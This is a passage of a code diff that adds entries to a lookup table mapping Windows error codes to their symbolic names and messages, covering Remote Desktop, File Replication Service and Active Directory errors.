+ 0x00001b68: ("ERROR_CTX_MODEM_RESPONSE_VOICE", "Voice detected at remote site on callback."),
+ 0x00001b69: ("ERROR_CTX_TD_ERROR", "Transport driver error"),
+ 0x00001b6e: ("ERROR_CTX_WINSTATION_NOT_FOUND", "The specified session cannot be found."),
+ 0x00001b6f: ("ERROR_CTX_WINSTATION_ALREADY_EXISTS", "The specified session name is already in use."),
+ 0x00001b70: ("ERROR_CTX_WINSTATION_BUSY", "The task you are trying to do can't be completed because Remote Desktop Services is currently busy. Please try again in a few minutes. Other users should still be able to log on."),
+ 0x00001b71: ("ERROR_CTX_BAD_VIDEO_MODE", "An attempt has been made to connect to a session whose video mode is not supported by the current client."),
+ 0x00001b7b: ("ERROR_CTX_GRAPHICS_INVALID", "The application attempted to enable DOS graphics mode. DOS graphics mode is not supported."),
+ 0x00001b7d: ("ERROR_CTX_LOGON_DISABLED", "Your interactive logon privilege has been disabled. Please contact your administrator."),
+ 0x00001b7e: ("ERROR_CTX_NOT_CONSOLE", "The requested operation can be performed only on the system console. This is most often the result of a driver or system DLL requiring direct console access."),
+ 0x00001b80: ("ERROR_CTX_CLIENT_QUERY_TIMEOUT", "The client failed to respond to the server connect message."),
+ 0x00001b81: ("ERROR_CTX_CONSOLE_DISCONNECT", "Disconnecting the console session is not supported."),
+ 0x00001b82: ("ERROR_CTX_CONSOLE_CONNECT", "Reconnecting a disconnected session to the console is not supported."),
+ 0x00001b84: ("ERROR_CTX_SHADOW_DENIED", "The request to control another session remotely was denied."),
+ 0x00001b85: ("ERROR_CTX_WINSTATION_ACCESS_DENIED", "The requested session access is denied."),
+ 0x00001b89: ("ERROR_CTX_INVALID_WD", "The specified terminal connection driver is invalid."),
+ 0x00001b8a: ("ERROR_CTX_SHADOW_INVALID", "The requested session cannot be controlled remotely."),
+ 0x00001b8b: ("ERROR_CTX_SHADOW_DISABLED", "The requested session is not configured to allow remote control."),
+ 0x00001b8c: ("ERROR_CTX_CLIENT_LICENSE_IN_USE", "Your request to connect to this Terminal Server has been rejected. Your Terminal Server client license number is currently being used by another user. Please call your system administrator to obtain a unique license number."),
+ 0x00001b8d: ("ERROR_CTX_CLIENT_LICENSE_NOT_SET", "Your request to connect to this Terminal Server has been rejected. Your Terminal Server client license number has not been entered for this copy of the Terminal Server client. Please contact your system administrator."),
+ 0x00001b8e: ("ERROR_CTX_LICENSE_NOT_AVAILABLE", "The number of connections to this computer is limited and all connections are in use right now. Try connecting later or contact your system administrator."),
+ 0x00001b8f: ("ERROR_CTX_LICENSE_CLIENT_INVALID", "The client you are using is not licensed to use this system. Your logon request is denied."),
+ 0x00001b90: ("ERROR_CTX_LICENSE_EXPIRED", "The system license has expired. Your logon request is denied."),
+ 0x00001b91: ("ERROR_CTX_SHADOW_NOT_RUNNING", "Remote control could not be terminated because the specified session is not currently being remotely controlled."),
+ 0x00001b92: ("ERROR_CTX_SHADOW_ENDED_BY_MODE_CHANGE", "The remote control of the console was terminated because the display mode was changed. Changing the display mode in a remote control session is not supported."),
+ 0x00001b93: ("ERROR_ACTIVATION_COUNT_EXCEEDED", "Activation has already been reset the maximum number of times for this installation. Your activation timer will not be cleared."),
+ 0x00001b94: ("ERROR_CTX_WINSTATIONS_DISABLED", "Remote logins are currently disabled."),
+ 0x00001b95: ("ERROR_CTX_ENCRYPTION_LEVEL_REQUIRED", "You do not have the proper encryption level to access this Session."),
+ 0x00001b96: ("ERROR_CTX_SESSION_IN_USE", "The user %s\\%s is currently logged on to this computer. Only the current user or an administrator can log on to this computer."),
+ 0x00001b97: ("ERROR_CTX_NO_FORCE_LOGOFF", "The user %s\\%s is already logged on to the console of this computer. You do not have permission to log in at this time. To resolve this issue, contact %s\\%s and have them log off."),
+ 0x00001b98: ("ERROR_CTX_ACCOUNT_RESTRICTION", "Unable to log you on because of an account restriction."),
+ 0x00001b99: ("ERROR_RDP_PROTOCOL_ERROR", "The RDP protocol component %2 detected an error in the protocol stream and has disconnected the client."),
+ 0x00001b9a: ("ERROR_CTX_CDM_CONNECT", "The Client Drive Mapping Service Has Connected on Terminal Connection."),
+ 0x00001b9b: ("ERROR_CTX_CDM_DISCONNECT", "The Client Drive Mapping Service Has Disconnected on Terminal Connection."),
+ 0x00001b9c: ("ERROR_CTX_SECURITY_LAYER_ERROR", "The Terminal Server security layer detected an error in the protocol stream and has disconnected the client."),
+ 0x00001b9d: ("ERROR_TS_INCOMPATIBLE_SESSIONS", "The target session is incompatible with the current session."),
+ 0x00001b9e: ("ERROR_TS_VIDEO_SUBSYSTEM_ERROR", "Windows can't connect to your session because a problem occurred in the Windows video subsystem. Try connecting again later, or contact the server administrator for assistance."),
+ 0x00001f41: ("FRS_ERR_INVALID_API_SEQUENCE", "The file replication service API was called incorrectly."),
+ 0x00001f42: ("FRS_ERR_STARTING_SERVICE", "The file replication service cannot be started."),
+ 0x00001f43: ("FRS_ERR_STOPPING_SERVICE", "The file replication service cannot be stopped."),
+ 0x00001f44: ("FRS_ERR_INTERNAL_API", "The file replication service API terminated the request. The event log may have more information."),
+ 0x00001f45: ("FRS_ERR_INTERNAL", "The file replication service terminated the request. The event log may have more information."),
+ 0x00001f46: ("FRS_ERR_SERVICE_COMM", "The file replication service cannot be contacted. The event log may have more information."),
+ 0x00001f47: ("FRS_ERR_INSUFFICIENT_PRIV", "The file replication service cannot satisfy the request because the user has insufficient privileges. The event log may have more information."),
+ 0x00001f48: ("FRS_ERR_AUTHENTICATION", "The file replication service cannot satisfy the request because authenticated RPC is not available. The event log may have more information."),
+ 0x00001f49: ("FRS_ERR_PARENT_INSUFFICIENT_PRIV", "The file replication service cannot satisfy the request because the user has insufficient privileges on the domain controller. The event log may have more information."),
+ 0x00001f4a: ("FRS_ERR_PARENT_AUTHENTICATION", "The file replication service cannot satisfy the request because authenticated RPC is not available on the domain controller. The event log may have more information."),
+ 0x00001f4b: ("FRS_ERR_CHILD_TO_PARENT_COMM", "The file replication service cannot communicate with the file replication service on the domain controller. The event log may have more information."),
+ 0x00001f4c: ("FRS_ERR_PARENT_TO_CHILD_COMM", "The file replication service on the domain controller cannot communicate with the file replication service on this computer. The event log may have more information."),
+ 0x00001f4d: ("FRS_ERR_SYSVOL_POPULATE", "The file replication service cannot populate the system volume because of an internal error. The event log may have more information."),
+ 0x00001f4e: ("FRS_ERR_SYSVOL_POPULATE_TIMEOUT", "The file replication service cannot populate the system volume because of an internal timeout. The event log may have more information."),
+ 0x00001f4f: ("FRS_ERR_SYSVOL_IS_BUSY", "The file replication service cannot process the request. The system volume is busy with a previous request."),
+ 0x00001f50: ("FRS_ERR_SYSVOL_DEMOTE", "The file replication service cannot stop replicating the system volume because of an internal error. The event log may have more information."),
+ 0x00001f51: ("FRS_ERR_INVALID_SERVICE_PARAMETER", "The file replication service detected an invalid parameter."),
+ 0x00002008: ("ERROR_DS_NOT_INSTALLED", "An error occurred while installing the directory service. For more information, see the event log."),
+ 0x00002009: ("ERROR_DS_MEMBERSHIP_EVALUATED_LOCALLY", "The directory service evaluated group memberships locally."),
+ 0x0000200a: ("ERROR_DS_NO_ATTRIBUTE_OR_VALUE", "The specified directory service attribute or value does not exist."),
+ 0x0000200b: ("ERROR_DS_INVALID_ATTRIBUTE_SYNTAX", "The attribute syntax specified to the directory service is invalid."),
+ 0x0000200c: ("ERROR_DS_ATTRIBUTE_TYPE_UNDEFINED", "The attribute type specified to the directory service is not defined."),
+ 0x0000200d: ("ERROR_DS_ATTRIBUTE_OR_VALUE_EXISTS", "The specified directory service attribute or value already exists."),
+ 0x0000200e: ("ERROR_DS_BUSY", "The directory service is busy."),
+ 0x0000200f: ("ERROR_DS_UNAVAILABLE", "The directory service is unavailable."),
+ 0x00002010: ("ERROR_DS_NO_RIDS_ALLOCATED", "The directory service was unable to allocate a relative identifier."),
+ 0x00002011: ("ERROR_DS_NO_MORE_RIDS", "The directory service has exhausted the pool of relative identifiers."),
+ 0x00002012: ("ERROR_DS_INCORRECT_ROLE_OWNER", "The requested operation could not be performed because the directory service is not the master for that type of operation."),
+ 0x00002013: ("ERROR_DS_RIDMGR_INIT_ERROR", "The directory service was unable to initialize the subsystem that allocates relative identifiers."),
+ 0x00002014: ("ERROR_DS_OBJ_CLASS_VIOLATION", "The requested operation did not satisfy one or more constraints associated with the class of the object."),
+ 0x00002015: ("ERROR_DS_CANT_ON_NON_LEAF", "The directory service can perform the requested operation only on a leaf object."),
+ 0x00002016: ("ERROR_DS_CANT_ON_RDN", "The directory service cannot perform the requested operation on the RDN attribute of an object."),
+ 0x00002017: ("ERROR_DS_CANT_MOD_OBJ_CLASS", "The directory service detected an attempt to modify the object class of an object."),
+ 0x00002018: ("ERROR_DS_CROSS_DOM_MOVE_ERROR", "The requested cross-domain move operation could not be performed."),
+ 0x00002019: ("ERROR_DS_GC_NOT_AVAILABLE", "Unable to contact the global catalog server."),
+ 0x0000201a: ("ERROR_SHARED_POLICY", "The policy object is shared and can only be modified at the root."),
+ 0x0000201b: ("ERROR_POLICY_OBJECT_NOT_FOUND", "The policy object does not exist."),
+ 0x0000201c: ("ERROR_POLICY_ONLY_IN_DS", "The requested policy information is only in the directory service."),
+ 0x0000201d: ("ERROR_PROMOTION_ACTIVE", "A domain controller promotion is currently active."),
+ 0x0000201e: ("ERROR_NO_PROMOTION_ACTIVE", "A domain controller promotion is not currently active"),
+ 0x00002020: ("ERROR_DS_OPERATIONS_ERROR", "An operations error occurred."),
+ 0x00002021: ("ERROR_DS_PROTOCOL_ERROR", "A protocol error occurred."),
+ 0x00002022: ("ERROR_DS_TIMELIMIT_EXCEEDED", "The time limit for this request was exceeded."),
+ 0x00002023: ("ERROR_DS_SIZELIMIT_EXCEEDED", "The size limit for this request was exceeded."),
+ 0x00002024: ("ERROR_DS_ADMIN_LIMIT_EXCEEDED", "The administrative limit for this request was exceeded."),
+ 0x00002025: ("ERROR_DS_COMPARE_FALSE", "The compare response was false."),
+ 0x00002026: ("ERROR_DS_COMPARE_TRUE", "The compare response was true."),
+ 0x00002027: ("ERROR_DS_AUTH_METHOD_NOT_SUPPORTED", "The requested authentication method is not supported by the server."),
+ 0x00002028: ("ERROR_DS_STRONG_AUTH_REQUIRED", "A more secure authentication method is required for this server."),
+ 0x00002029: ("ERROR_DS_INAPPROPRIATE_AUTH", "Inappropriate authentication."),
+ 0x0000202a: ("ERROR_DS_AUTH_UNKNOWN", "The authentication mechanism is unknown."),
+ 0x0000202b: ("ERROR_DS_REFERRAL", "A referral was returned from the server."),
+ 0x0000202c: ("ERROR_DS_UNAVAILABLE_CRIT_EXTENSION", "The server does not support the requested critical extension."),
+ 0x0000202d: ("ERROR_DS_CONFIDENTIALITY_REQUIRED", "This request requires a secure connection."),
+ 0x0000202e: ("ERROR_DS_INAPPROPRIATE_MATCHING", "Inappropriate matching."),
+ 0x0000202f: ("ERROR_DS_CONSTRAINT_VIOLATION", "A constraint violation occurred."),
+ 0x00002030: ("ERROR_DS_NO_SUCH_OBJECT", "There is no such object on the server."),
+ 0x00002031: ("ERROR_DS_ALIAS_PROBLEM", "There is an alias problem."),
+ 0x00002032: ("ERROR_DS_INVALID_DN_SYNTAX", "An invalid dn syntax has been specified."),
+ 0x00002033: ("ERROR_DS_IS_LEAF", "The object is a leaf object."),
+ 0x00002034: ("ERROR_DS_ALIAS_DEREF_PROBLEM", "There is an alias dereferencing problem."),
+ 0x00002035: ("ERROR_DS_UNWILLING_TO_PERFORM", "The server is unwilling to process the request."),
+ 0x00002036: ("ERROR_DS_LOOP_DETECT", "A loop has been detected."),
+ 0x00002037: ("ERROR_DS_NAMING_VIOLATION", "There is a naming violation."),
+ 0x00002038: ("ERROR_DS_OBJECT_RESULTS_TOO_LARGE", "The result set is too large."),
+ 0x00002039: ("ERROR_DS_AFFECTS_MULTIPLE_DSAS", "The operation affects multiple DSAs"),
+ 0x0000203a: ("ERROR_DS_SERVER_DOWN", "The server is not operational."),
+ 0x0000203b: ("ERROR_DS_LOCAL_ERROR", "A local error has occurred."),
+ 0x0000203c: ("ERROR_DS_ENCODING_ERROR", "An encoding error has occurred."),
+ 0x0000203d: ("ERROR_DS_DECODING_ERROR", "A decoding error has occurred."),
+ 0x0000203e: ("ERROR_DS_FILTER_UNKNOWN", "The search filter cannot be recognized."),
+ 0x0000203f: ("ERROR_DS_PARAM_ERROR", "One or more parameters are illegal."),
+ 0x00002040: ("ERROR_DS_NOT_SUPPORTED", "The specified method is not supported."),
+ 0x00002041: ("ERROR_DS_NO_RESULTS_RETURNED", "No results were returned."),
+ 0x00002042: ("ERROR_DS_CONTROL_NOT_FOUND", "The specified control is not supported by the server."),
+ 0x00002043: ("ERROR_DS_CLIENT_LOOP", "A referral loop was detected by the client."),
+ 0x00002044: ("ERROR_DS_REFERRAL_LIMIT_EXCEEDED", "The preset referral limit was exceeded."),
+ 0x00002045: ("ERROR_DS_SORT_CONTROL_MISSING", "The search requires a SORT control."),
+ 0x00002046: ("ERROR_DS_OFFSET_RANGE_ERROR", "The search results exceed the offset range specified."),
+ 0x00002047: ("ERROR_DS_RIDMGR_DISABLED", "The directory service detected the subsystem that allocates relative identifiers is disabled. This can occur as a protective mechanism when the system determines a significant portion of relative identifiers (RIDs) have been exhausted. Please see https://go.microsoft.com/fwlink/?LinkId=228610 for recommended diagnostic steps and the procedure to re-enable account creation."),
+ 0x0000206d: ("ERROR_DS_ROOT_MUST_BE_NC", "The root object must be the head of a naming context. The root object cannot have an instantiated parent."),
+ 0x0000206e: ("ERROR_DS_ADD_REPLICA_INHIBITED", "The add replica operation cannot be performed. The naming context must be writeable in order to create the replica."),
+ 0x0000206f: ("ERROR_DS_ATT_NOT_DEF_IN_SCHEMA", "A reference to an attribute that is not defined in the schema occurred."),
+ 0x00002070: ("ERROR_DS_MAX_OBJ_SIZE_EXCEEDED", "The maximum size of an object has been exceeded."),
+ 0x00002071: ("ERROR_DS_OBJ_STRING_NAME_EXISTS", "An attempt was made to add an object to the directory with a name that is already in use."),
+ 0x00002072: ("ERROR_DS_NO_RDN_DEFINED_IN_SCHEMA", "An attempt was made to add an object of a class that does not have an RDN defined in the schema."),
+ 0x00002073: ("ERROR_DS_RDN_DOESNT_MATCH_SCHEMA", "An attempt was made to add an object using an RDN that is not the RDN defined in the schema."),
+ 0x00002074: ("ERROR_DS_NO_REQUESTED_ATTS_FOUND", "None of the requested attributes were found on the objects."),
+ 0x00002075: ("ERROR_DS_USER_BUFFER_TO_SMALL", "The user buffer is too small."),
+ 0x00002076: ("ERROR_DS_ATT_IS_NOT_ON_OBJ", "The attribute specified in the operation is not present on the object."),
+ 0x00002077: ("ERROR_DS_ILLEGAL_MOD_OPERATION", "Illegal modify operation. Some aspect of the modification is not permitted."),
+ 0x00002078: ("ERROR_DS_OBJ_TOO_LARGE", "The specified object is too large."),
+ 0x00002079: ("ERROR_DS_BAD_INSTANCE_TYPE", "The specified instance type is not valid."),
+ 0x0000207a: ("ERROR_DS_MASTERDSA_REQUIRED", "The operation must be performed at a master DSA."),
+ 0x0000207b: ("ERROR_DS_OBJECT_CLASS_REQUIRED", "The object class attribute must be specified."),
+ 0x0000207c: ("ERROR_DS_MISSING_REQUIRED_ATT", "A required attribute is missing."),
+ 0x0000207d: ("ERROR_DS_ATT_NOT_DEF_FOR_CLASS", "An attempt was made to modify an object to include an attribute that is not legal for its class."),
+ 0x0000207e: ("ERROR_DS_ATT_ALREADY_EXISTS", "The specified attribute is already present on the object."),
+ 0x00002080: ("ERROR_DS_CANT_ADD_ATT_VALUES", "The specified attribute is not present, or has no values."),
+ 0x00002081: ("ERROR_DS_SINGLE_VALUE_CONSTRAINT", "Multiple values were specified for an attribute that can have only one value."),
+ 0x00002082: ("ERROR_DS_RANGE_CONSTRAINT", "A value for the attribute was not in the acceptable range of values."),
+ 0x00002083: ("ERROR_DS_ATT_VAL_ALREADY_EXISTS", "The specified value already exists."),
+ 0x00002084: ("ERROR_DS_CANT_REM_MISSING_ATT", "The attribute cannot be removed because it is not present on the object."),
+ 0x00002085: ("ERROR_DS_CANT_REM_MISSING_ATT_VAL", "The attribute value cannot be removed because it is not present on the object."),
+ 0x00002086: ("ERROR_DS_ROOT_CANT_BE_SUBREF", "The specified root object cannot be a subref."),
+ 0x00002087: ("ERROR_DS_NO_CHAINING", "Chaining is not permitted."),
+ 0x00002088: ("ERROR_DS_NO_CHAINED_EVAL", "Chained evaluation is not permitted."),
+ 0x00002089: ("ERROR_DS_NO_PARENT_OBJECT", "The operation could not be performed because the object's parent is either uninstantiated or deleted."),
+ 0x0000208a: ("ERROR_DS_PARENT_IS_AN_ALIAS", "Having a parent that is an alias is not permitted. Aliases are leaf objects."),
+ 0x0000208b: ("ERROR_DS_CANT_MIX_MASTER_AND_REPS", "The object and parent must be of the same type, either both masters or both replicas."),
+ 0x0000208c: ("ERROR_DS_CHILDREN_EXIST", "The operation cannot be performed because child objects exist. This operation can only be performed on a leaf object."),
+ 0x0000208d: ("ERROR_DS_OBJ_NOT_FOUND", "Directory object not found."),
+ 0x0000208e: ("ERROR_DS_ALIASED_OBJ_MISSING", "The aliased object is missing."),
+ 0x0000208f: ("ERROR_DS_BAD_NAME_SYNTAX", "The object name has bad syntax."),
+ 0x00002090: ("ERROR_DS_ALIAS_POINTS_TO_ALIAS", "It is not permitted for an alias to refer to another alias."),
+ 0x00002091: ("ERROR_DS_CANT_DEREF_ALIAS", "The alias cannot be dereferenced."),
+ 0x00002092: ("ERROR_DS_OUT_OF_SCOPE", "The operation is out of scope."),
+ 0x00002093: ("ERROR_DS_OBJECT_BEING_REMOVED", "The operation cannot continue because the object is in the process of being removed."),
+ 0x00002094: ("ERROR_DS_CANT_DELETE_DSA_OBJ", "The DSA object cannot be deleted."),
+ 0x00002095: ("ERROR_DS_GENERIC_ERROR", "A directory service error has occurred."),
+ 0x00002096: ("ERROR_DS_DSA_MUST_BE_INT_MASTER", "The operation can only be performed on an internal master DSA object."),
+ 0x00002097: ("ERROR_DS_CLASS_NOT_DSA", "The object must be of class DSA."),
+ 0x00002098: ("ERROR_DS_INSUFF_ACCESS_RIGHTS", "Insufficient access rights to perform the operation."),
+ 0x00002099: ("ERROR_DS_ILLEGAL_SUPERIOR", "The object cannot be added because the parent is not on the list of possible superiors."),
+ 0x0000209a: ("ERROR_DS_ATTRIBUTE_OWNED_BY_SAM", "Access to the attribute is not permitted because the attribute is owned by the Security Accounts Manager (SAM)."),
+ 0x0000209b: ("ERROR_DS_NAME_TOO_MANY_PARTS", "The name has too many parts."),
+ 0x0000209c: ("ERROR_DS_NAME_TOO_LONG", "The name is too long."),
+ 0x0000209d: ("ERROR_DS_NAME_VALUE_TOO_LONG", "The name value is too long."),
+ 0x0000209e: ("ERROR_DS_NAME_UNPARSEABLE", "The directory service encountered an error parsing a name."),
+ 0x0000209f: ("ERROR_DS_NAME_TYPE_UNKNOWN", "The directory service cannot get the attribute type for a name."),
+ 0x000020a0: ("ERROR_DS_NOT_AN_OBJECT", "The name does not identify an object; the name identifies a phantom."),
+ 0x000020a1: ("ERROR_DS_SEC_DESC_TOO_SHORT", "The security descriptor is too short."),
+ 0x000020a2: ("ERROR_DS_SEC_DESC_INVALID", "The security descriptor is invalid."),
+ 0x000020a3: ("ERROR_DS_NO_DELETED_NAME", "Failed to create name for deleted object."),
+ 0x000020a4: ("ERROR_DS_SUBREF_MUST_HAVE_PARENT", "The parent of a new subref must exist."),
+ 0x000020a5: ("ERROR_DS_NCNAME_MUST_BE_NC", "The object must be a naming context."),
+ 0x000020a6: ("ERROR_DS_CANT_ADD_SYSTEM_ONLY", "It is not permitted to add an attribute which is owned by the system."),
+ 0x000020a7: ("ERROR_DS_CLASS_MUST_BE_CONCRETE", "The class of the object must be structural; you cannot instantiate an abstract class."),
+ 0x000020a8: ("ERROR_DS_INVALID_DMD", "The schema object could not be found."),
+ 0x000020a9: ("ERROR_DS_OBJ_GUID_EXISTS", "A local object with this GUID (dead or alive) already exists."),
+ 0x000020aa: ("ERROR_DS_NOT_ON_BACKLINK", "The operation cannot be performed on a back link."),
+ 0x000020ab: ("ERROR_DS_NO_CROSSREF_FOR_NC", "The cross reference for the specified naming context could not be found."),
+ 0x000020ac: ("ERROR_DS_SHUTTING_DOWN", "The operation could not be performed because the directory service is shutting down."),
+ 0x000020ad: ("ERROR_DS_UNKNOWN_OPERATION", "The directory service request is invalid."),
+ 0x000020ae: ("ERROR_DS_INVALID_ROLE_OWNER", "The role owner attribute could not be read."),
+ 0x000020af: ("ERROR_DS_COULDNT_CONTACT_FSMO", "The requested FSMO operation failed. The current FSMO holder could not be contacted."),
+ 0x000020b0: ("ERROR_DS_CROSS_NC_DN_RENAME", "Modification of a DN across a naming context is not permitted."),
+ 0x000020b1: ("ERROR_DS_CANT_MOD_SYSTEM_ONLY", "The attribute cannot be modified because it is owned by the system."),
+ 0x000020b2: ("ERROR_DS_REPLICATOR_ONLY", "Only the replicator can perform this function."),
+ 0x000020b3: ("ERROR_DS_OBJ_CLASS_NOT_DEFINED", "The specified class is not defined."),
+ 0x000020b4: ("ERROR_DS_OBJ_CLASS_NOT_SUBCLASS", "The specified class is not a subclass."),
+ 0x000020b5: ("ERROR_DS_NAME_REFERENCE_INVALID", "The name reference is invalid."),
+ 0x000020b6: ("ERROR_DS_CROSS_REF_EXISTS", "A cross reference already exists."),
+ 0x000020b7: ("ERROR_DS_CANT_DEL_MASTER_CROSSREF", "It is not permitted to delete a master cross reference."),
+ 0x000020b8: ("ERROR_DS_SUBTREE_NOTIFY_NOT_NC_HEAD", "Subtree notifications are only supported on NC heads."),
+ 0x000020b9: ("ERROR_DS_NOTIFY_FILTER_TOO_COMPLEX", "Notification filter is too complex."),
+ 0x000020ba: ("ERROR_DS_DUP_RDN", "Schema update failed: duplicate RDN."),
+ 0x000020bb: ("ERROR_DS_DUP_OID", "Schema update failed: duplicate OID."),
+ 0x000020bc: ("ERROR_DS_DUP_MAPI_ID", "Schema update failed: duplicate MAPI identifier."),
+ 0x000020bd: ("ERROR_DS_DUP_SCHEMA_ID_GUID", "Schema update failed: duplicate schema-id GUID."),
+ 0x000020be: ("ERROR_DS_DUP_LDAP_DISPLAY_NAME", "Schema update failed: duplicate LDAP display name."),
+ 0x000020bf: ("ERROR_DS_SEMANTIC_ATT_TEST", "Schema update failed: range-lower less than range upper."),
+ 0x000020c0: ("ERROR_DS_SYNTAX_MISMATCH", "Schema update failed: syntax mismatch."),
+ 0x000020c1: ("ERROR_DS_EXISTS_IN_MUST_HAVE", "Schema deletion failed: attribute is used in must-contain."),
+ 0x000020c2: ("ERROR_DS_EXISTS_IN_MAY_HAVE", "Schema deletion failed: attribute is used in may-contain."),
+ 0x000020c3: ("ERROR_DS_NONEXISTENT_MAY_HAVE", "Schema update failed: attribute in may-contain does not exist."),
+ 0x000020c4: ("ERROR_DS_NONEXISTENT_MUST_HAVE", "Schema update failed: attribute in must-contain does not exist."),
+ 0x000020c5: ("ERROR_DS_AUX_CLS_TEST_FAIL", "Schema update failed: class in aux-class list does not exist or is not an auxiliary class."),
+ 0x000020c6: ("ERROR_DS_NONEXISTENT_POSS_SUP", "Schema update failed: class in poss-superiors does not exist."),
+ 0x000020c7: ("ERROR_DS_SUB_CLS_TEST_FAIL", "Schema update failed: class in subclassof list does not exist or does not satisfy hierarchy rules."),
+ 0x000020c8: ("ERROR_DS_BAD_RDN_ATT_ID_SYNTAX", "Schema update failed: Rdn-Att-Id has wrong syntax."),
+ 0x000020c9: ("ERROR_DS_EXISTS_IN_AUX_CLS", "Schema deletion failed: class is used as auxiliary class."),
+ 0x000020ca: ("ERROR_DS_EXISTS_IN_SUB_CLS", "Schema deletion failed: class is used as sub class."),
+ 0x000020cb: ("ERROR_DS_EXISTS_IN_POSS_SUP", "Schema deletion failed: class is used as poss superior."),
+ 0x000020cc: ("ERROR_DS_RECALCSCHEMA_FAILED", "Schema update failed in recalculating validation cache."),
+ 0x000020cd: ("ERROR_DS_TREE_DELETE_NOT_FINISHED", "The tree deletion is not finished. The request must be made again to continue deleting the tree."),
+ 0x000020ce: ("ERROR_DS_CANT_DELETE", "The requested delete operation could not be performed."),
+ 0x000020cf: ("ERROR_DS_ATT_SCHEMA_REQ_ID", "Cannot read the governs class identifier for the schema record."),
+ 0x000020d0: ("ERROR_DS_BAD_ATT_SCHEMA_SYNTAX", "The attribute schema has bad syntax."),
+ 0x000020d1: ("ERROR_DS_CANT_CACHE_ATT", "The attribute could not be cached."),
+ 0x000020d2: ("ERROR_DS_CANT_CACHE_CLASS", "The class could not be cached."),
+ 0x000020d3: ("ERROR_DS_CANT_REMOVE_ATT_CACHE", "The attribute could not be removed from the cache."),
+ 0x000020d4: ("ERROR_DS_CANT_REMOVE_CLASS_CACHE", "The class could not be removed from the cache."),
+ 0x000020d5: ("ERROR_DS_CANT_RETRIEVE_DN", "The distinguished name attribute could not be read."),
+ 0x000020d6: ("ERROR_DS_MISSING_SUPREF", "No superior reference has been configured for the directory service. The directory service is therefore unable to issue referrals to objects outside this forest."),
+ 0x000020d7: ("ERROR_DS_CANT_RETRIEVE_INSTANCE", "The instance type attribute could not be retrieved."),
+ 0x000020d8: ("ERROR_DS_CODE_INCONSISTENCY", "An internal error has occurred."),
+ 0x000020d9: ("ERROR_DS_DATABASE_ERROR", "A database error has occurred."),
+ 0x000020da: ("ERROR_DS_GOVERNSID_MISSING", "The attribute GOVERNSID is missing."),
+ 0x000020db: ("ERROR_DS_MISSING_EXPECTED_ATT", "An expected attribute is missing."),
+ 0x000020dc: ("ERROR_DS_NCNAME_MISSING_CR_REF", "The specified naming context is missing a cross reference."),
+ 0x000020dd: ("ERROR_DS_SECURITY_CHECKING_ERROR", "A security checking error has occurred."),
+ 0x000020de: ("ERROR_DS_SCHEMA_NOT_LOADED", "The schema is not loaded."),
+ 0x000020df: ("ERROR_DS_SCHEMA_ALLOC_FAILED", "Schema allocation failed. Please check if the machine is running low on memory."),
+ 0x000020e0: ("ERROR_DS_ATT_SCHEMA_REQ_SYNTAX", "Failed to obtain the required syntax for the attribute schema."),
+ 0x000020e1: ("ERROR_DS_GCVERIFY_ERROR", "The global catalog verification failed. The global catalog is not available or does not support the operation. Some part of the directory is currently not available."),
+ 0x000020e2: ("ERROR_DS_DRA_SCHEMA_MISMATCH", "The replication operation failed because of a schema mismatch between the servers involved."),
+ 0x000020e3: ("ERROR_DS_CANT_FIND_DSA_OBJ", "The DSA object could not be found."),
+ 0x000020e4: ("ERROR_DS_CANT_FIND_EXPECTED_NC", "The naming context could not be found."),
+ 0x000020e5: ("ERROR_DS_CANT_FIND_NC_IN_CACHE", "The naming context could not be found in the cache."),
+ 0x000020e6: ("ERROR_DS_CANT_RETRIEVE_CHILD", "The child object could not be retrieved."),
+ 0x000020e7: ("ERROR_DS_SECURITY_ILLEGAL_MODIFY", "The modification was not permitted for security reasons."),
+ 0x000020e8: ("ERROR_DS_CANT_REPLACE_HIDDEN_REC", "The operation cannot replace the hidden record."),
+ 0x000020e9: ("ERROR_DS_BAD_HIERARCHY_FILE", "The hierarchy file is invalid."),
+ 0x000020ea: ("ERROR_DS_BUILD_HIERARCHY_TABLE_FAILED", "The attempt to build the hierarchy table failed."),
+ 0x000020eb: ("ERROR_DS_CONFIG_PARAM_MISSING", "The directory configuration parameter is missing from the registry."),
+ 0x000020ec: ("ERROR_DS_COUNTING_AB_INDICES_FAILED", "The attempt to count the address book indices failed."),
+ 0x000020ed: ("ERROR_DS_HIERARCHY_TABLE_MALLOC_FAILED", "The allocation of the hierarchy table failed."),
+ 0x000020ee: ("ERROR_DS_INTERNAL_FAILURE", "The directory service encountered an internal failure."),
+ 0x000020ef: ("ERROR_DS_UNKNOWN_ERROR", "The directory service encountered an unknown failure."),
+ 0x000020f0: ("ERROR_DS_ROOT_REQUIRES_CLASS_TOP", "A root object requires a class of 'top'."),
+ 0x000020f1: ("ERROR_DS_REFUSING_FSMO_ROLES", "This directory server is shutting down, and cannot take ownership of new floating single-master operation roles."),
+ 0x000020f2: ("ERROR_DS_MISSING_FSMO_SETTINGS", "The directory service is missing mandatory configuration information, and is unable to determine the ownership of floating single-master operation roles."),
+ 0x000020f3: ("ERROR_DS_UNABLE_TO_SURRENDER_ROLES", "The directory service was unable to transfer ownership of one or more floating single-master operation roles to other servers."),
+ 0x000020f4: ("ERROR_DS_DRA_GENERIC", "The replication operation failed."),
+ 0x000020f5: ("ERROR_DS_DRA_INVALID_PARAMETER", "An invalid parameter was specified for this replication operation."),
+ 0x000020f6: ("ERROR_DS_DRA_BUSY", "The directory service is too busy to complete the replication operation at this time."),
+ 0x000020f7: ("ERROR_DS_DRA_BAD_DN", "The distinguished name specified for this replication operation is invalid."),
+ 0x000020f8: ("ERROR_DS_DRA_BAD_NC", "The naming context specified for this replication operation is invalid."),
+ 0x000020f9: ("ERROR_DS_DRA_DN_EXISTS", "The distinguished name specified for this replication operation already exists."),
+ 0x000020fa: ("ERROR_DS_DRA_INTERNAL_ERROR", "The replication system encountered an internal error."),
+ 0x000020fb: ("ERROR_DS_DRA_INCONSISTENT_DIT", "The replication operation encountered a database inconsistency."),
+ 0x000020fc: ("ERROR_DS_DRA_CONNECTION_FAILED", "The server specified for this replication operation could not be contacted."),
+ 0x000020fd: ("ERROR_DS_DRA_BAD_INSTANCE_TYPE", "The replication operation encountered an object with an invalid instance type."),
+ 0x000020fe: ("ERROR_DS_DRA_OUT_OF_MEM", "The replication operation failed to allocate memory."),
+ 0x000020ff: ("ERROR_DS_DRA_MAIL_PROBLEM", "The replication operation encountered an error with the mail system."),
+ 0x00002100: ("ERROR_DS_DRA_REF_ALREADY_EXISTS", "The replication reference information for the target server already exists."),
+ 0x00002101: ("ERROR_DS_DRA_REF_NOT_FOUND", "The replication reference information for the target server does not exist."),
